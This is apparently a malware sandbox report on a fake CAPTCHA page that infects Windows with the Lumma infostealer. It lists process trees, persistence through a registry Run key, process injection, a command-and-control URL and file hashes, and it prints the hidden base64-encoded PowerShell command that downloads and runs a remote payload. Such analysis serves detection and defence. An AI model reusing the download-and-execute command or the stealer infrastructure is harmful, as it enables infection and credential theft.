lumma | hxxps://check-your-humanity[.]b-cdn[.]net/capt-v2[.]html

Analysis

max time kernel
569s
max time network
487s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
22-11-2024 08:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://check-your-humanity.b-cdn.net/capt-v2.html

Score

10^/10

lumma discovery execution persistence stealer

Malware Config

Extracted

Family

lumma

https://candidatersz.cyou/api

Signatures

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
Blocklisted process makes network request 7 IoCs

Processes:

PowerShell.exemsiexec.exe

flow pid process

57 5440 PowerShell.exe
80 2140 msiexec.exe
83 2140 msiexec.exe
86 2140 msiexec.exe
90 2140 msiexec.exe
97 2140 msiexec.exe
99 2140 msiexec.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

PowerShell.exe

pid process

5440 PowerShell.exe
Executes dropped EXE 1 IoCs

Processes:

Set-up.exe

pid process

3472 Set-up.exe
Loads dropped DLL 9 IoCs

Processes:

Set-up.exe

pid process

3472 Set-up.exe
3472 Set-up.exe
3472 Set-up.exe
3472 Set-up.exe
3472 Set-up.exe
3472 Set-up.exe
3472 Set-up.exe
3472 Set-up.exe
3472 Set-up.exe

flow	pid	process
57	5440	PowerShell.exe
80	2140	msiexec.exe
83	2140	msiexec.exe
86	2140	msiexec.exe
90	2140	msiexec.exe
97	2140	msiexec.exe
99	2140	msiexec.exe

pid	process
5440	PowerShell.exe

pid	process
3472	Set-up.exe

pid	process
3472	Set-up.exe
3472	Set-up.exe
3472	Set-up.exe
3472	Set-up.exe
3472	Set-up.exe
3472	Set-up.exe
3472	Set-up.exe
3472	Set-up.exe
3472	Set-up.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

PowerShell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetUtilityApp = "C:\\Users\\Admin\\AppData\\Roaming\\QHUPRmIp\\Set-up.exe"	PowerShell.exe

Drops file in System32 directory 1 IoCs

Processes:

PowerShell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\WindowsPowerShell\v1.0\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	PowerShell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

Set-up.exe

description pid process target process

PID 3472 set thread context of 5612 3472 Set-up.exe more.com

description	pid	process	target process
PID 3472 set thread context of 5612	3472	Set-up.exe	more.com

Drops file in Program Files directory 2 IoCs

Processes:

setup.exe

description	ioc	process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\56df52d0-1b1a-4428-9a25-10d4e5a3b0f2.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20241122080745.pma	setup.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

more.commsiexec.exeSet-up.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	more.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Set-up.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exePowerShell.exetaskmgr.exe

pid	process
4296	msedge.exe
4296	msedge.exe
3376	msedge.exe
3376	msedge.exe
4648	identity_helper.exe
4648	identity_helper.exe
5440	PowerShell.exe
5440	PowerShell.exe
5440	PowerShell.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

taskmgr.exe

pid process

5344 taskmgr.exe
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

Set-up.exemore.com

pid process

3472 Set-up.exe
5612 more.com
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

Processes:

msedge.exe

pid process

3376 msedge.exe
3376 msedge.exe
3376 msedge.exe
3376 msedge.exe
3376 msedge.exe
3376 msedge.exe

pid	process
5344	taskmgr.exe

pid	process
3472	Set-up.exe
5612	more.com

Suspicious use of AdjustPrivilegeToken 8 IoCs

Processes:

PowerShell.exetaskmgr.exe

description	pid	process
Token: SeDebugPrivilege	5440	PowerShell.exe
Token: SeDebugPrivilege	5344	taskmgr.exe
Token: SeSystemProfilePrivilege	5344	taskmgr.exe
Token: SeCreateGlobalPrivilege	5344	taskmgr.exe
Token: SeSecurityPrivilege	5344	taskmgr.exe
Token: SeTakeOwnershipPrivilege	5344	taskmgr.exe
Token: SeSecurityPrivilege	5344	taskmgr.exe
Token: SeTakeOwnershipPrivilege	5344	taskmgr.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

msedge.exetaskmgr.exe

pid	process
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

msedge.exetaskmgr.exe

pid	process
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe
5344	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 3376 wrote to memory of 1160	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 1160	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 5084	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 5084	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 5084	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 5084	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 5084	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 5084	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 5084	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 5084	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 5084	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 5084	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 5084	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 5084	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 5084	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 5084	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 5084	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 5084	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 5084	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 5084	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 5084	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 5084	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 5084	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 5084	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 5084	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 5084	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 5084	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 5084	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 5084	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 5084	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 5084	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 5084	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 5084	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 5084	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 5084	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 5084	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 5084	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 5084	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 5084	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 5084	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 5084	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 5084	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 4296	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 4296	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 1488	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 1488	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 1488	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 1488	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 1488	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 1488	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 1488	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 1488	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 1488	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 1488	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 1488	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 1488	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 1488	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 1488	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 1488	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 1488	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 1488	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 1488	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 1488	3376	msedge.exe	msedge.exe
PID 3376 wrote to memory of 1488	3376	msedge.exe	msedge.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://check-your-humanity.b-cdn.net/capt-v2.html
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3376
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffaf04246f8,0x7ffaf0424708,0x7ffaf0424718
  2⤵
  PID:1160
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,2826004649836005447,9932182305756327289,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2
  2⤵
  PID:5084
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,2826004649836005447,9932182305756327289,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4296
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,2826004649836005447,9932182305756327289,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2832 /prefetch:8
  2⤵
  PID:1488
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,2826004649836005447,9932182305756327289,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:1
  2⤵
  PID:3408
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,2826004649836005447,9932182305756327289,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3468 /prefetch:1
  2⤵
  PID:4240
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,2826004649836005447,9932182305756327289,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5732 /prefetch:8
  2⤵
  PID:4272
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
  2⤵
  - Drops file in Program Files directory
  PID:2396
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ff6c9295460,0x7ff6c9295470,0x7ff6c9295480
    3⤵
    PID:3264
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,2826004649836005447,9932182305756327289,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5732 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4648
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,2826004649836005447,9932182305756327289,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5928 /prefetch:1
  2⤵
  PID:5768
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,2826004649836005447,9932182305756327289,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5880 /prefetch:1
  2⤵
  PID:5776
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,2826004649836005447,9932182305756327289,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3484 /prefetch:1
  2⤵
  PID:5996
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,2826004649836005447,9932182305756327289,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3580 /prefetch:1
  2⤵
  PID:6004
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,2826004649836005447,9932182305756327289,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3160 /prefetch:2
  2⤵
  PID:5092

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4884

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4152

C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w hiDdEn "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vZmlsZXpjdnNkcy5iLWNkbi5uZXQvZ2t6SGRxZmcudHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"
1⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5440
- C:\Users\Admin\AppData\Roaming\QHUPRmIp\Set-up.exe
  "C:\Users\Admin\AppData\Roaming\QHUPRmIp\Set-up.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: MapViewOfSection
  PID:3472
- - C:\Windows\SysWOW64\more.com
    C:\Windows\SysWOW64\more.com
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: MapViewOfSection
    PID:5612
  - - C:\Windows\SysWOW64\msiexec.exe
      C:\Windows\SysWOW64\msiexec.exe
      4⤵
      Blocklisted process makes network request
      System Location Discovery: System Language Discovery
      PID:2140

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5344

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1772

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b9fc751d5fa08ca574eba851a781b900

SHA1
963c71087bd9360fa4aa1f12e84128cd26597af4

SHA256
360b095e7721603c82e03afa392eb3c3df58e91a831195fc9683e528c2363bbb

SHA512
ecb8d509380f5e7fe96f14966a4d83305cd9a2292bf42dec349269f51176a293bda3273dfe5fba5a32a6209f411e28a7c2ab0d36454b75e155fc053974980757

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
d9a93ee5221bd6f61ae818935430ccac

SHA1
f35db7fca9a0204cefc2aef07558802de13f9424

SHA256
a756ec37aec7cd908ea1338159800fd302481acfddad3b1701c399a765b7c968

SHA512
b47250fdd1dd86ad16843c3df5bed88146c29279143e20f51af51f5a8d9481ae655db675ca31801e98ab1b82b01cb87ae3c83b6e68af3f7835d3cfa83100ad44

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

Filesize
70KB

MD5
e5e3377341056643b0494b6842c0b544

SHA1
d53fd8e256ec9d5cef8ef5387872e544a2df9108

SHA256
e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

SHA512
83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
469B

MD5
cc02cdb347e8cc59a0b37dd6631bba58

SHA1
52ed6345a49fe99a7232621e4eeafd35777ea4fe

SHA256
99eff1c284c9a544fb1379ca5ddc074d1d4200b962fb47158283415c118cb8c1

SHA512
c4467b547ee68f95c1c4e639b012d42d2a6b1e1ad9aa331c758aabbf85130dff4a35907c1b47ddfbe78f338cc686004cc59dcfa080e8bf3d48573f7c83f803e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State~RFe58b6e7.TMP

Filesize
59B

MD5
2800881c775077e1c4b6e06bf4676de4

SHA1
2873631068c8b3b9495638c865915be822442c8b

SHA256
226eec4486509917aa336afebd6ff65777b75b65f1fb06891d2a857a9421a974

SHA512
e342407ab65cc68f1b3fd706cd0a37680a0864ffd30a6539730180ede2cdcd732cc97ae0b9ef7db12da5c0f83e429df0840dbf7596aca859a0301665e517377b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
e9e2a27419e0852df60330660bc01c98

SHA1
723eb6e6247c42dcf02209a8f069bd0eebd55953

SHA256
21cd2b9b096e9d1cf2f4b4574aa9360f051cc980c75fa76b177c6569abbcc777

SHA512
eeafc7b47d3baedc37397d82cf7e20bd3ba5c58ba776943e8acbaefce343662847c61180c6b11dca9ea1f1900380b52978210e3fa72419326f83c276c9aef643

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
